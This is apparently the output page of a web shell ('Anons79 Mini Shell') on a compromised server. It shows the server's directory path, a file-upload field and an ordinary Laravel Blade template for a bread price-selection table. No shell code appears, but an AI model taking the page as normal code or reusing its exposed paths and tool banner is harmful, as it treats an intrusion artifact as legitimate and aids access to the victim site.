Anons79 Mini Shell

Directory : /home/aplikasiposinfo/public_html/hayyumart.com/resources/views/roti/
Upload File :
Current File : /home/aplikasiposinfo/public_html/hayyumart.com/resources/views/roti/get_data.blade.php

    
    <table class="table table-striped table-hover table-bordered matmix-dt">
        <thead>
            <tr>   
                <th>Status Member</th>
                <th>Harga Beli</th>
                <th >Harga Jual</th> <!-- column 1 -->
                
                <th rowspan="2">Aksi</th>
              
              </tr>
            
        </thead>
        <tbody>
            @foreach($datas as $data)
                <tr style="font-weight: bold;">
                    <td colspan="4">
                        Roti : {{ $data->kd_roti }} / {{ $data->barcode }} / {{ $data->nm_roti }} <label class="label label-info">Stok : {{ $data->stok }}</label>
                    </td>
                </tr>
                @foreach ($data->harga_roti as $harga)
                <tr>
                    <td>
                        {{ $harga->pelanggan->nm_pelanggan }}
                    </td>
                    <td>
                        Rp.{{ number_format($data->harga_beli) }}
                    </td>
                    <td>
                        Rp.{{ number_format((float)$harga->harga_jual) }}
                    </td>

                    <td>
                        <button class="btn btn-danger terpilih" data-kode="{{ $harga->id }}" data-nama="{{ $data->nm_roti }}" data-harga="{{ $harga->harga_jual }}" data-hargabeli="{{ $data->harga_beli }}" data-hargajual="{{ $harga->harga_jual }}" data-diskon="0" data-stok="{{ $data->stok }}" data-dismiss="modal" data-kd="{{ $data->kd_roti }}">Pilih</button>
                    </td>
                </tr>
                @endforeach
            @endforeach
            
        </tbody>
    </table>
</div>
<div class="dt-pagination">
    <nav>
        {!! $datas->links() !!}
    </nav>
</div>

Anons79 File Manager Version 1.0, Coded By Anons79
Email: [email protected]